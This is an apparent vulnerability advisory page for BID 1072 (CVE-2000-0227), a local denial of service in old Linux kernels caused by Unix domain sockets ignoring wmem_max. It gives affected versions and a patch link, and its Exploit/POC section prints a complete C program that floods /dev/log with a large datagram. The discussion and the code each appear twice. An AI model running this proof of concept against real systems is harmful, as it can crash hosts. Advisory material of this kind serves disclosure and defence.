Multiple Linux Vendor Domain Socket Denial of Service Vulnerability
BID:1072
Info
Multiple Linux Vendor Domain Socket Denial of Service Vulnerability
| Bugtraq ID: | 1072 |
| Class: | Boundary Condition Error |
| CVE: |
CVE-2000-0227 |
| Remote: | No |
| Local: | Yes |
| Published: | Mar 23 2000 12:00AM |
| Updated: | Jul 11 2009 01:56AM |
| Credit: | This vulnerability was posted to the Bugtraq mailing list on March 23, 2000 by Jay Fenlason <[email protected]> |
| Vulnerable: |
Redhat Linux 6.2 i386 Redhat Linux 6.1 sparc Redhat Linux 6.1 i386 Redhat Linux 6.1 alpha Linux kernel 2.3.99 -pre2 Linux kernel 2.2.14 Linux kernel 2.2.12 |
| Not Vulnerable: |
Linux kernel 2.2.15 pre16 |
Discussion
Multiple Linux Vendor Domain Socket Denial of Service Vulnerability
A denial of service exists in Linux kernels, as related to Unix domain sockets ignoring limits as set in /proc/sys/net/core/wmem_max. By creating successive Unix domain sockets, it is possible to cause a denial of service in some versions of the Linux kernel. Versions 2.2.12, 2.2.14, and 2.3.99-pre2 have all been confirmed as being vulnerable. Previous kernel versions are most likely vulnerable.
A denial of service exists in Linux kernels, as related to Unix domain sockets ignoring limits as set in /proc/sys/net/core/wmem_max. By creating successive Unix domain sockets, it is possible to cause a denial of service in some versions of the Linux kernel. Versions 2.2.12, 2.2.14, and 2.3.99-pre2 have all been confirmed as being vulnerable. Previous kernel versions are most likely vulnerable.
Exploit / POC
Multiple Linux Vendor Domain Socket Denial of Service Vulnerability
#include <sys/types.h>
#include <sys/socket.h>
#include <string.h>
char buf[128 * 1024];
int main ( int argc, char **argv )
{
struct sockaddr SyslogAddr;
int LogFile;
int bufsize = sizeof(buf)-5;
int i;
for ( i = 0; i < bufsize; i++ )
buf[i] = ' '+(i%95);
buf[i] = '\0';
SyslogAddr.sa_family = AF_UNIX;
strncpy ( SyslogAddr.sa_data, "/dev/log", sizeof(SyslogAddr.sa_data) );
LogFile = socket ( AF_UNIX, SOCK_DGRAM, 0 );
sendto ( LogFile, buf, bufsize, 0, &SyslogAddr, sizeof(SyslogAddr) );
return 0;
}
#include <sys/types.h>
#include <sys/socket.h>
#include <string.h>
char buf[128 * 1024];
int main ( int argc, char **argv )
{
struct sockaddr SyslogAddr;
int LogFile;
int bufsize = sizeof(buf)-5;
int i;
for ( i = 0; i < bufsize; i++ )
buf[i] = ' '+(i%95);
buf[i] = '\0';
SyslogAddr.sa_family = AF_UNIX;
strncpy ( SyslogAddr.sa_data, "/dev/log", sizeof(SyslogAddr.sa_data) );
LogFile = socket ( AF_UNIX, SOCK_DGRAM, 0 );
sendto ( LogFile, buf, bufsize, 0, &SyslogAddr, sizeof(SyslogAddr) );
return 0;
}
Solution / Fix
Multiple Linux Vendor Domain Socket Denial of Service Vulnerability
Linux kernel 2.2.14
Linux kernel 2.2.14
-
Alan Cox linux-2.2.15pre16.tar.gz
http://www.kernel.org/pub/linux/kernel/people/alan/2.2.15pre/pre-patch -2.2.15-16.gz
References
Multiple Linux Vendor Domain Socket Denial of Service Vulnerability
References:
References: